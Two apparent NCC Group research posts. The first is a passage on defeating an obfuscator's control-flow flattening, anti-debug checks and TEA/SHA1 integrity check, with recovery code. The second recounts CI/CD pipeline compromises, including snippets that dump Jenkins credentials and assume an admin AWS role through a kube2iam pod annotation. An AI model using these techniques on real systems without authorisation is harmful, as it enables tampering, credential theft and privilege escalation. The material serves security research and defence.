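Expressed in code, that mapping pass might look like the sketch below. Note this is only an illustrative outline: dispatch_head, loop_blocks, num_dispatch_entries, STATE_REG and run_symbolic_block are hypothetical stand-ins for the loop-matching results and the symbolic engine, not any specific framework’s API:

# Hypothetical sketch: for every possible state-variable value, walk the
# dispatch loop symbolically and record which non-loop block it lands on.
index_to_offset = {}
for index in range(num_dispatch_entries):
    state = {STATE_REG: index}           # seed the engine with one concrete index
    block = dispatch_head
    while block in loop_blocks:          # stay within the dispatcher structure
        state, block = run_symbolic_block(block, state)
    index_to_offset[index] = block       # first offset outside the dispatch loop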

Real Destination(s) Recovery

The following steps consist of leveraging the index-to-offset map to reconnect these BBL-chains with each other and recreate the original control-flow graph. As can be seen in the captures below, the value of the state variable is set using instruction-level obfuscation. Some BBL-chains only bear a single static possible destination, which can be swiftly evaluated.

For dynamic-destination BBL-chains, once the register used as a state variable has been identified, the next step is to identify the determinant symbols, i.e., the registers and memory locations (globals or local variables) that affect the value of the state register when re-entering the dispatch loop.

This can be accomplished by computing the intermediate language representation (IR) of the assembly flow graph (or BBLs) and building a dependency graph from it. Here we are taking advantage of a limitation of the obfuscator: the determinants for multi-destination BBLs are always contained within the BBL subgraph formed between two dispatchers.

With those determinants identified, the task that remains is to identify what condition these determinants are fulfilling, as well as what destinations in code we jump to once the condition has been evaluated. The Z3 SMT solver from Microsoft is traditionally used around dynamic symbolic engines (DSE) as a means of finding input values leading to new paths. Here, the deobfuscator uses its capabilities to identify the type of comparison the instructions are replacing.

For example, for the equal pattern, the code asks Z3 whether two valid destination indexes (D1 and D2) exist such that (see the sketch after this list):

  • If the determinants are equal, the value of the state register is equal to D1
  • If the determinants are different, the value of the state register is equal to D2
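As a rough illustration of how such a query can be phrased with Z3’s Python bindings, consider the sketch below; state_expr is a hypothetical helper returning the symbolic expression recovered for the state register, not part of any real API:

from z3 import BitVec, ForAll, Implies, Solver, sat

mod0, mod1 = BitVec('mod0', 32), BitVec('mod1', 32)  # the determinants
d1, d2 = BitVec('D1', 32), BitVec('D2', 32)          # candidate destination indexes

s = Solver()
s.add(d1 != d2)
# Does a (D1, D2) pair exist such that the state expression always selects
# D1 when the determinants are equal, and D2 otherwise?
s.add(ForAll([mod0, mod1], Implies(mod0 == mod1, state_expr(mod0, mod1) == d1)))
s.add(ForAll([mod0, mod1], Implies(mod0 != mod1, state_expr(mod0, mod1) == d2)))
if s.check() == sat:
    print('equal pattern:', s.model()[d1], s.model()[d2])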

Finally, the corresponding instruction can be assembled and patched into the assembly, replacing the identified patterns with equivalent assembly sequences such as the ones below, where

  • mod0 and mod1 are the identified determinants
  • #SREG is the state register, now free to be repurposed to store the value of one of the determinants (which may be stored in memory)
  • #OFFSET0 is the offset corresponding to the destination index if the tested condition is true
  • #OFFSET1 is the offset corresponding to the destination index if the tested condition is false
class EqualPattern(Pattern):
  assembly = '''
  MOV   #SREG, mod0
  CMP   #SREG, mod1
  JZ    #OFFSET0
  NOP
  JMP   #OFFSET1
  '''

class UnsignedGreaterPattern(Pattern):
  assembly = '''
  MOV   #SREG, mod0
  CMP   #SREG, mod1
  JA    #OFFSET0
  NOP
  JMP   #OFFSET1
  '''

class SignedGreaterPattern(Pattern):
  assembly = '''
  MOV   #SREG, mod0
  CMP   #SREG, mod1
  JG    #OFFSET0
  NOP
  JMP   #OFFSET1
  '''

The resulting CFG, since every original block has been reattached directly to its real target(s), effectively separates the dispatch loop from the significant BBLs. Below is the result of this first pass against a sample function:

This approach does not aim at handling all possible theoretical cases; it takes advantage of the fact that the obfuscator only transforms a small set of arithmetic operations.

Integrity Check Removal

Once the flow graph has been unflattened, the next step is to remove the integrity checks. These can mostly be identified using a simple graph matching algorithm (using Miasm’s “MatchGraphJoker” expressions) which also constitutes a weakness in the obfuscator. In order to account for some corner cases, the detection logic implemented here involves symbolically executing the identified loop candidates, and recording their reads against the .text section in order to provide a robust identification.

On the above graph, the hash verification flow is highlighted in yellow and the failure case (in this case, sending the execution to an address with invalid instructions) in red. Once the loop has been positively identified, the script simply links the green basic blocks to remove the hash check entirely.

“Dead” Instructions Removal

The resulting assembly is unflattened, and does not include the integrity checks anymore, but still includes a number of “dead” instructions which do not have any effect on the function’s logic and can be removed. For example, in the sample below, the value of EAX is not accessed between its first assignment and its subsequent ones. Consequently, the first assignment of EAX, regardless of the path taken, can be safely removed without altering the function’s logic.

start:
    MOV   EAX, 0x1234   ; dead store: EAX is rewritten on every path below
    TEST  EBX, EBX
    JNZ   path1
path0:
    XOR   EAX, EAX      ; EAX reassigned here (and again at path1)...
path1:
    MOV   EAX, 0x1      ; ...and unconditionally reassigned here

Using a dependency graph (depgraph) again, but this time, keeping a map of ASM <-> IR (one-to-many), the following pass removes the assembly instructions for which the depgraph has determined all corresponding IRs are non-performative.

Finally, the framework-provided simplifications, such as bbl-merger, can be applied automatically to each block bearing a single successor, provided the successor only has a single predecessor. The error paths can also be identified and “cauterized”, which should be a no-op since they should never be executed, but smooths the rebuilding of the executable.

A Note On Antidebug Mechanisms

While a number of canonical anti-debug techniques were identified in the samples, only a few will be covered here, as the techniques are well-known and can be largely ignored.

PEB->isBeingDebugged

In the example below, the function checks the PEB for isBeingDebugged (offset 0x2) and sends the execution into a stack-mangling loop before continuing execution, which leads to a certain crash, obfuscating context from a naive debugging attempt.

Debug Interrupts

Another mechanism involves debug software interrupts and vectored exception handlers, but is rendered easily comprehensible once the function has been processed. The code first sets two local variables to pseudorandom constant values, then registers a vectored exception handler via a call to AddVectoredExceptionHandler. An INT 0x3 (debug interrupt) instruction is then executed (via the indirect call to ISSUE_INT3_FN), but encoded using the long form of the instruction: 0xCD 0x03.

After executing the INT 0x3 instruction, the code flow is resumed in the exception handler as can be seen below.

If the exception code from the EXCEPTION_RECORD structure is a debug breakpoint, a bitwise NOT is applied to one of the constants stored on stack. Additionally, the Windows interrupt handler handles every debug exception assuming they stemmed from executing the short version of the instruction (0xCC), so were a debugger to intercept the exception, those two elements need to be taken into consideration in order for execution to continue normally.

Upon continuing execution, a small arithmetic operation checks that the addition of one of the initially set constants (0x8A7B7A99) and a third one (0x60D7B571) is equal to the bitwise NOT of the second initial constant (0x14ACCFF5), which is the operation performed by the exception handler.

0x8A7B7A99 + 0x60D7B571 == 0xEB53300A == ~0x14ACCFF5
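A quick Python check (masking to 32 bits) confirms the relationship:

MASK = 0xFFFFFFFF
assert (0x8A7B7A99 + 0x60D7B571) & MASK == (~0x14ACCFF5) & MASK == 0xEB53300A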

A variant using the same exception handler operates in a very similar manner, substituting the debug exception with an access violation triggered via allocating a guard page and accessing it (this behavior is also flagged by ICPin).

Rebuilding The Executable

Once all the passes have been applied to all the obfuscated functions, the patches can be recorded, then applied to a free area of the new executable, and a JUMP is inserted at the function’s original offset.

Example of a function before and after deobfuscation:

Obfuscator’s Integrity Checking Internals

It is generally unnecessary to dig into the details of an obfuscator’s integrity checking mechanism; most times, as described in the previous example, identifying its location or expected result is sufficient to disable it. However, this provides a good opportunity to demonstrate the use of a DSE to address an obfuscator’s internals – theoretically its most hardened part.

ICPin output immediately highlights a number of code locations performing incremental reads on addresses in the executable’s .text section. Some manual investigation of these code locations points us to the spot where a function call or branching instruction switches to the obfuscated execution flow. However, there are no clearly defined function frames and the entire set of executed instructions is too large to display in IDA.

In order to get a sense of the execution flow, a simple jitter callback can be used to gather all the executed blocks as the engine runs through the code. Looking at the discovered blocks, it becomes apparent that the code uses conditional instructions to alter the return address on the stack, and hides its real destination with opaque predicates and obfuscated logic.

Starting with that information, it would be possible to take a similar approach as in the previous example and thoroughly rebuild the IR CFG, apply simplifications, and recompile the new assembly using LLVM. However, in this instance, armed with the knowledge that this obfuscated code implements an integrity check, it is advantageous to leverage the capabilities of a DSE.

A CFG of the obfuscated flow can still be roughly computed, by recording every block executed and adding edges based on the tracked destinations. The stock simplifications and SSA form can be used to obtain a graph of the general shape below:

Deciphering The Data Blobs

On a first run attempt, one can observe 8-byte reads from blobs located in two separate memory locations in the .text section, which are then processed through a loop (also conveniently identified by the tracking engine). With the memX symbols representing constants in memory, and blob0 representing a 32-bit word read sequentially from the ciphertext blob, the symbolic values extracted from the blobs look as follows, looping 32 times:

res = (blob0 + ((mem1 ^ mem2)*mul) + sh32l((mem1 ^ mem2), 0x5)) ^ (mem3 + sh32l(blob0, 0x4)) ^ (mem4 + sh32r(blob0, 0x5))

Inspection of the values stored at memory locations mem1 and mem2 reveals the following constants:

@32[0x1400DF45A]: 0xA46D3BBF
@32[0x14014E859]: 0x3A5A4206

0xA46D3BBF^0x3A5A4206 = 0x9E3779B9

0x9E3779B9 is a well-known nothing up my sleeve number, based on the golden ratio, and notably used by RC5. In this instance however, the expression points at another Feistel cipher, TEA, or Tiny Encryption Algorithm:

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }
    v[0]=v0; v[1]=v1;
}

Consequently, the 128-bit key can be trivially recovered from the remaining memory locations identified by the symbolic engine.

Extracting The Offset Ranges

With the decryption cipher identified, the next step is to reverse the logic of computing ranges of memory to be hashed. Here again, the memory tracking execution engine proves useful and provides two data points of interest:
  • The binary is not hashed in a continuous way; rather, 8-byte offsets are regularly skipped
  • A memory region is iteratively accessed before each hashing

Using a DSE such as this one, symbolizing the first two bytes of the memory region and letting it run all the way to the address of the instruction that reads memory, we obtain the output below (edited for clarity):

-- MEM ACCESS: {BLOB0 & 0x7F 0 8, 0x0 8 64} + 0x140000000
# {BLOB0 0 8, 0x0 8 32} & 0x80 = 0x0
...

-- MEM ACCESS: {(({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32} 0 32, 0x0 32 64} + 0x140000000
# 0x0 = ({BLOB0 0 8, 0x0 8 32} & 0x80)?(0x0,0x1)
# ((({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32}) == 0xFFFFFFFF = 0x0
...

The accessed memory’s symbolic addresses alone provide a clear hint at the encoding: only 7 of the bits of each symbolized byte are used to compute the address. Looking further into the accesses, the second byte is only used if the first byte’s most significant bit is set, which tracks with a simple unsigned integer base-128 compression. Essentially, the algorithm reads one byte at a time, using 7 bits for data, and using the last bit to indicate whether further bytes should be read to compute the final value.
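For illustration, a minimal Python decoder for this scheme could look as follows (the same logic appears within the parse_ranges() function at the end of this post):

def read_varint(data, i=0):
  # Decode one base-128 value starting at offset i; return (value, next offset)
  value, shift = 0, 0
  while True:
    byte = data[i]
    i += 1
    value |= (byte & 0x7F) << shift   # 7 data bits per byte
    shift += 7
    if not byte & 0x80:               # MSB clear: last byte of this value
      return value, i

# Example: bytes 0x92 0x24 decode to (0x92 & 0x7F) | (0x24 << 7) = 0x1212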

Identifying The Hashing Algorithm

In order to establish whether the integrity checking implements a known hashing algorithm, despite the static disassembly showing no sign of known constants, a memory tracking symbolic execution engine can be used to investigate one level deeper. Early in the execution (running the obfuscated code in its entirety may take a long time), one can observe the following pattern, revealing well-known SHA1 constants.

0x140E34F50 READ @32[0x140D73B5D]: 0x96F977D0
0x140E34F52 READ @32[0x140B1C599]: 0xF1BC54D1
0x140E34F54 READ @32[0x13FC70]: 0x0
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD0]: 0x67452301

0x140E34F50 READ @32[0x140D73B61]: 0x752ED515
0x140E34F52 READ @32[0x140B1C59D]: 0x9AE37E9C
0x140E34F54 READ @32[0x13FC70]: 0x1
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD4]: 0xEFCDAB89

0x140E34F50 READ @32[0x140D73B65]: 0xF9396DD4
0x140E34F52 READ @32[0x140B1C5A1]: 0x6183B12A
0x140E34F54 READ @32[0x13FC70]: 0x2
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD8]: 0x98BADCFE

0x140E34F50 READ @32[0x140D73B69]: 0x2A1B81B5
0x140E34F52 READ @32[0x140B1C5A5]: 0x3A29D5C3
0x140E34F54 READ @32[0x13FC70]: 0x3
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCDC]: 0x10325476

0x140E34F50 READ @32[0x140D73B6D]: 0xFB95EF83
0x140E34F52 READ @32[0x140B1C5A9]: 0x38470E73
0x140E34F54 READ @32[0x13FC70]: 0x4
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCE0]: 0xC3D2E1F0

Examining the relevant code addresses (as seen in the SSA notation below), it becomes evident that, in order to compute the necessary hash constants, a simple XOR instruction is used with two otherwise meaningless constants, rendering algorithm identification less obvious from static analysis alone.

And the expected SHA1 constants are stored on the stack:

0x96F977D0 ^ 0xF1BC54D1 ==> 0x67452301
0x752ED515 ^ 0x9AE37E9C ==> 0xEFCDAB89
0xF9396DD4 ^ 0x6183B12A ==> 0x98BADCFE
0x2A1B81B5 ^ 0x3A29D5C3 ==> 0x10325476
0xFB95EF83 ^ 0x38470E73 ==> 0xC3D2E1F0

Additionally, the SHA1 algorithm steps can be further observed in the SSA graph, such as the ROTL-5 and ROTL-30 operations, plainly visible in the IL below.

Final Results

The entire integrity-checking logic recovered from the obfuscator, reimplemented in Python below, was verified to produce the same digest as when running under the debugger or a straightforward LLVM jitter. The parse_ranges() function handles the encoding, while the accumulate_bytes() generator handles the deciphering and processing of both range blobs and skipped-offset blobs.

Once the hashing of the memory ranges dictated by the offset table has completed, the 64-bit values located at the offsets deciphered from the second blob are subsequently hashed. Finally, once the computed hash value has been successfully compared to the valid digest stored within the RWX .text section of the executable, the execution flow is deemed secure and the obfuscator proceeds to decipher protected functions within the .text section.

import hashlib
import struct
from sys import argv

# Note: PE (executable parsing / offset translation) and Tea (TEA decryption)
# are helper classes from the author's tooling; a minimal assumed Tea
# implementation is sketched after the script.
def parse_ranges(table):
  ranges = []
  rangevals = []
  tmp = []
  for byte in table:
    tmp.append(byte)
    if not byte&0x80:
      val = 0
      for i,b in enumerate(tmp):
        val |= (b&0x7F)<<(7*i)
      rangevals.append(val)
      tmp = [] # reset
  offset = 0
  for p in [(rangevals[i], rangevals[i+1]) for i in range(0, len(rangevals), 2)]:
    offset += p[0]
    if offset == 0xFFFFFFFF:
      break
    ranges.append((p[0], p[1]))
    offset += p[1]
  return ranges

def accumulate_bytes(r, s):
  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped < current+size:
      # Hash up to the skipped offset, then hop over the 8 skipped bytes.
      # NOTE: this comparison and slice are a best-guess reconstruction; the
      # original lines were mangled by HTML-escaping of '<' and '>'.
      blob = pe[pe.rva2off(current):pe.rva2off(current)+(next_skipped-current)]
      size -= len(blob)+8
      assert size >= 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

if __name__ == '__main__':
  main()
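The PE and Tea helpers referenced above come from the author’s tooling and are not included here. As a reference point, a minimal Tea class compatible with the calls made by accumulate_bytes() might look like the sketch below, directly transcribing the reference C code into Python (ECB mode over 8-byte blocks and little-endian word order are assumptions):

import struct

class Tea:
  # Minimal TEA (ECB) decryptor; assumed interface for the script above.
  DELTA = 0x9E3779B9
  MASK = 0xFFFFFFFF

  def __init__(self, key):
    self.k = struct.unpack('<4I', key)

  def _decrypt_block(self, v0, v1):
    k0, k1, k2, k3 = self.k
    total = 0xC6EF3720                  # 32 * DELTA, as in the C reference
    for _ in range(32):
      v1 = (v1 - (((v0 << 4) + k2) ^ (v0 + total) ^ ((v0 >> 5) + k3))) & self.MASK
      v0 = (v0 - (((v1 << 4) + k0) ^ (v1 + total) ^ ((v1 >> 5) + k1))) & self.MASK
      total = (total - self.DELTA) & self.MASK
    return v0, v1

  def decrypt(self, data):
    out = bytearray()
    for i in range(0, len(data) - 7, 8):
      v0, v1 = struct.unpack_from('<2I', data, i)
      out += struct.pack('<2I', *self._decrypt_block(v0, v1))
    return bytes(out)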

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.


✇NCC Group Research

10 real-world stories of how we’ve compromised CI/CD pipelines

By: Aaron Haymore

by Aaron Haymore, Iain Smart, Viktor Gazdag, Divya Natesan, and Jennifer Fernick

Mainstream appreciation for cyberattacks targeting continuous integration and continuous delivery/continuous deployment (CI/CD) pipelines has been gaining momentum. Attackers and defenders increasingly understand that build pipelines are highly-privileged targets with a substantial attack surface.

But what are the potential weak points in a CI/CD pipeline? What does this type of attack look like in practice? NCC Group has found many attack paths through different security assessments that could have led to a compromised CI/CD pipeline in enterprises large and small.

In this post, we will share some of our war stories about what we have observed and been able to demonstrate on CI/CD pipeline security assessments, clearly showing why the saying “they are execution engines” exists.

Through showing many different flavors of attack on possible development pipelines, we hope to emphasize the criticality of securing this varied attack surface to better secure the software supply chain.

Jenkins with multiple attack angles

The first 3 attack stories are related to Jenkins, a leading CI/CD tool used by many companies, and one that our consultants came across when working on multiple assessments for major software companies.

Attack #1: “It Always Starts with an S3 Bucket…”

The usual small misconfiguration in an S3 bucket led to a full DevOps environment compromise. The initial attack angle was via a web application. The attack flow for this compromise involved:

Web application -> Directory listing on S3 bucket -> Hardcoded Git credential in script file -> Git access -> Access Jenkins with the same hardcoded Git credential -> Dump credentials from Jenkins -> Lateral movement -> Game Over -> Incident -> Internal Investigation

NCC Group performed a black box web application assessment with anonymous access on an Internet-facing web application. At the beginning of the test, a sitemap file was discovered in a sitemap folder. The sitemap folder turned out to be an S3 bucket with directory listing enabled. Looking through the files in the S3 bucket, a bash shell script was spotted. After a closer inspection, a hardcoded git command with a credential was revealed. The credentials gave the NCC Group consultant access as a limited user to the Jenkins Master web login UI, which was only accessible internally and not from the Internet. After a couple of clicks and looking around in the cluster, they were able to switch to an administrator account. With administrator privileges, the consultant used Groovy one-liners in the script console (see the sketch below) and dumped around 200 different credentials, such as AWS access tokens, SAST/DAST tokens, EC2 SSH certificates, Jenkins users, and other Jenkins credentials. The assessment ended with the client conducting incident response, working closely with the consultant for remediation.
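For context on that credential dump step, the sketch below shows the general shape of the technique: a short Groovy script submitted to the script console’s /scriptText endpoint enumerates stored credential IDs. The hostname, account and API token are placeholders, and the exact Groovy needed varies with the credential types installed:

import requests

JENKINS = 'http://jenkins.internal:8080'  # placeholder target
GROOVY = '''
import com.cloudbees.plugins.credentials.Credentials
import com.cloudbees.plugins.credentials.CredentialsProvider
CredentialsProvider.lookupCredentials(Credentials.class,
    jenkins.model.Jenkins.instance, null, null).each { println(it.id) }
'''
# Basic auth with an API token; an admin-capable account is assumed
r = requests.post(JENKINS + '/scriptText', data={'script': GROOVY},
                  auth=('admin', 'api-token'))
print(r.text)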

NCC gave a detailed report with remediation and hardening steps for the client, and some of the recommended steps were the following:

  • Remove directory listing for S3
  • Remove shell script file and hardcoded credential
  • Remove the connection that allows anyone with GitHub access to access Jenkins
  • Install and review Audit Trail and Job Configuration History plugins
  • Jenkins should not be accessible from the Internet (in this case, we tested onsite)
  • Change and lower the privileges the Jenkins account had
  • Deploy and use MFA for administrator accounts

Attack #2: Privilege Escalation in Hardened Environment

The following steps describe another privilege escalation path found by the consultant on a different assessment:

Login with SSO credentials -> Testing separated, lock down and documented roles -> One role with Build/Replay code execution -> Credentials dump

The assessment was to review a newly implemented, hardened Jenkins environment with documented user roles that had been created using the least-privilege principle. Jenkins was running under a non-root user with the latest versions of core and plugins, and had an SSL certificate and SSO with MFA for login. The NCC Group consultant had access to one user with a specific role per day and tested whether there was any privilege escalation path.

The builder role had the Build/Replay permission as well (which allows replaying a Pipeline build with a modified script or with additional Groovy code), not just the Build permission to build the jobs. This allowed NCC Group consultants to run Groovy code and dump credentials of Jenkins users and other secrets.

Attack #3: Confusing Wording in a Plugin

The last angle was a confusing option in a Jenkins plugin that led to wide-open access:

GitHub Authorization -> Authenticated Git User with Read Access -> Jenkins Access with Gmail Account

The GitHub OAuth Plugin was deployed in Jenkins to provide authentication and authorization. The “Grant READ permissions to all Authenticated Users” and “Use GitHub repository permissions” options were ticked, which allowed anyone with a GitHub account (even external users) to access the Jenkins web login UI. NCC Group was able to register and use their own hosted email account to get access to the projects.

GitLab CI/CD Pipeline Attacks

NCC Group has done many jobs looking at another well-known and widely used tool called GitLab. As a result, NCC Group consultants have found some interesting attack paths.

Attack #4: Take Advantage of Protected Branches

On one particular job, there were multiple major flaws in how the GitLab Runners were set up. The first major flaw was that the runners were using privileged containers, meaning they were configured with the “--privileged” flag, which would allow them to spin up other privileged containers that could trivially escape to the host. This was a pretty straightforward attack vector that could get you to the host. But what made this one interesting was that these GitLab Runners were also shared Runners and not isolated: one developer who was only supposed to push code to a certain repository could also get access to secrets and highly privileged repositories. In addition, these shared Runners exposed highly sensitive secrets, such as auth tokens and passwords, through environment variables. A user who had limited push access to a repository could therefore obtain highly privileged secrets.

Protected branches are branches that can be maintained by someone with a maintainer role within GitLab, who can say “only these people can push against these source code repositories or branches”, with a change request (CR) chain associated with it. These protected branches can be associated with a protected runner. You can lock it down so the developer has to get the CR approved to push code. But in this case, no CR process or protected branch was implemented and enforced. Anybody could push to an unprotected branch and then chain the previous exploits. Chaining these 4-5 vulnerabilities gave all access.

There were lots of different paths as well. Even setting the “--privileged” flag aside, there was also another path to get to the privileged containers. There was a requirement for the developers to be able to run the docker command, so the host’s Docker daemon was shared with the GitLab Shared Runner. That led to access to the host and jumping between containers.

The consultant worked with the client to understand and help remediate the issues, and was keen to understand the root causes of what led to these choices being made. Why did they make these configuration choices, and what trade-offs did they consider? What were the more secure alternatives to these choices; were they aware of these options, and if so, why weren’t they chosen?

The reason that the company wanted privileged containers was to do static analysis on the code that was being pushed. Consultants explained that they should have isolated Runners and not use the shared Runners, and should have further limited access control. This emphasized an important point: It is possible to run privileged containers and to still somewhat limit the amount of sensitive information exposed.

Many of GitLab’s CI/CD security mechanisms to execute jobs depend on the premise that protected branches only contain trusted build jobs and content as administrated by Project’s Maintainers. Users at a Project’s Maintainer Privilege Level or above have the ability to deputize other users to be able to manage and push to specific protected branches as well. These privileged users are the gateway representing what is and is not considered trusted within the project. Making this distinction is important to reduce the exposure of privileges to untrusted build jobs.

Attack #5: GitLab Runners Using Privileged Containers

On another job, GitLab Runners were configured to execute CI/CD jobs with Docker’s “--privileged” flag. This flag negates any security isolation provided by Docker to protect the host from potentially unsafe containers. By disabling these security features, the container process was free to escalate its privileges to root on the host through a variety of features. Some tools were packaged as Docker images, and to support this, the client used Docker in Docker (DIND) within a privileged container to execute nested containers.

If privileged CI/CD jobs are necessary, then the corresponding Runners should be configured to only execute on protected branches of projects which are known to be legitimate. This will prevent arbitrary developers from submitting unreviewed scripts which can result in host compromise. The Maintainer Role’s ability to manage protected branches for projects means they regulate control over any privileges supplied by an associated protected Runner.

Attack #6: Highly Privileged Shared Runners could claim jobs associated with sensitive Environment Variables and Privileged Kubernetes Environments.

Privileged Runners should not be configured as Shared Runners or broadly scoped groups. Instead, they should be configured as needed for specific projects or groups which are considered to have equivalent privilege levels among users at the maintainer level and above.

Attack #7: Runners Exposed Secrets to Untrusted CI/CD Jobs

Runners make calls to API endpoints which are authenticated using various tokens and passwords. Because these were Shared Runners, authentication tokens and passwords could be accessed trivially by any user with rights to commit source code to GitLab. Runners were configured to expose the secrets through environment variables. Secrets management, especially in CI/CD pipelines, is a tough issue to solve.

To mitigate these types of risks, ensure that environment variables configured by Runners in all build jobs do not hold any privileged credentials. Properly-scoped GitLab variables can be used as a replacement. Environment variables should only hold informational configuration values which should be considered accessible to any developer in their associated projects and groups.

If Runners must provide credentials to their jobs through environment variables or mounted volumes, then the Runners should limit the workloads to which they are exposed. To do so, such Runners should only be associated with the most specific possible project/group. Additionally, they ought to be marked as “protected” so that they can only process jobs on protected branches.

Attack #8: Host Docker Daemon Exposed to Shared GitLab Runner

On one job, the GitLab Shared Runners mounted the host’s Docker socket into CI/CD job containers at runtime. While this allows legitimate developers to run arbitrary Docker commands on the host for build purposes, it also allows build jobs to deploy privileged containers on the host itself to escape their containment. This also provides attackers with a window through which they can compromise other build jobs running on the host. Essentially, this negates all separation provided by Docker preventing the contained process from accessing other containers and the host. The following remediations are recommended in this case:

  • Do not allow developers to directly interact with Docker daemons on hosts they do not control. Consider running Docker build jobs using a tool that supports rootless Docker building such as kaniko.
  • Alternatively, develop a process that runs a static set of Docker commands on source code repositories to build them. This process should not be performed within the CI/CD job itself as job scripts are user-defined and the commands can be overwritten.
  • If this must be implemented through a CI/CD job, then build jobs executed on these Runners should be considered privileged, and as such should be restricted to Docker Runners accepting commits made to protected and known-safe repositories, to ensure that any user-defined CI/CD jobs have gone through a formal approval process.

Kubernetes

Pods that run a certain functionality sometimes end up using different pod authentication mechanisms to reach out to various services; AWS credentials are one example. Many times, people use plugins and don’t restrict API paths around the plugins. For example, Kube2IAM is a plugin that is seen often, and if you don’t configure it correctly, from a pod you can get privileged containers that can lead to privileged API credentials that let you see what the underlying host is doing.

Attack #9: Kube2IAM

Kube2IAM works off of pod annotations. It intercepts calls made from a container pod to the AWS metadata API (169.254.169.254). An NCC Group consultant found an interesting situation where every developer could annotate pods. The AWS role that Kube2IAM was using was configured with an “sts assume-role *” line. That allowed any developer who could create or annotate a pod to inherit the admin AWS role. This meant that anyone who could create any pod and specify an annotation could get admin privileges on the main AWS tooling account for a bank. This account had VPC peering configured that could look into any pod and non-pod environments. You could get anywhere with that access. Consider a pipeline that builds a pod: all an attacker would have to do is add an annotation to it that outputs something at the end, as sketched below.
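As an illustration of how little this requires from an attacker, the sketch below uses the Kubernetes Python client to launch a pod carrying the kube2iam role annotation; the role name, namespace and image are assumptions for illustration:

from kubernetes import client, config

config.load_kube_config()
pod = client.V1Pod(
    metadata=client.V1ObjectMeta(
        name='innocuous-build',
        # kube2iam reads this annotation to decide which role to vend
        annotations={'iam.amazonaws.com/role': 'admin-role'},  # assumed role name
    ),
    spec=client.V1PodSpec(
        restart_policy='Never',
        containers=[client.V1Container(
            name='c',
            image='amazon/aws-cli',
            command=['aws', 'sts', 'get-caller-identity'],  # runs with the annotated role
        )],
    ),
)
client.CoreV1Api().create_namespaced_pod(namespace='default', body=pod)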

There was another similar job performed by an NCC Group consultant. In this scenario, they could not annotate pods – instead, Kube2IAM has a “whitelist route regex” flag in which you can specify AWS API paths, controlling which routes can and cannot be reached. The DevOps admins had configured that with a wildcard character, which would allow someone to get access to privileged paths leading to the underlying node credentials.

Attack #10: The Power of a Developer Laptop

In our final scenario, the NCC Group consultant got booked on a scenario-based assessment:

“Pretend you have compromised a developer’s laptop.”

All that the consultant could do was commit code to a single Java library built with Maven. They set one of the pre-requirement files to an arbitrary file that would give a shell from the build environment, changing it to a reverse Meterpreter shell payload. They found that the pod had an SSH key lying on disk that went to the Jenkins master node, and then dumped all the variables from Jenkins. They then discovered that this was a real deployment pipeline that had write permissions and cluster-admin into the Kubernetes workload. Consequently, they now had access to the full production environment.

There was another job where NCC Group consultant compromised one user account and had access to a pipeline that was authenticated to the developer group. Running custom code was not possible in the pipeline, but they could tell the pipeline to build off a different branch even if it did not exist. The pipeline crashed and dumped out environment variables. One of the environment variables was a Windows domain administrator account. The blue team saw the pipeline crash but did not investigate.

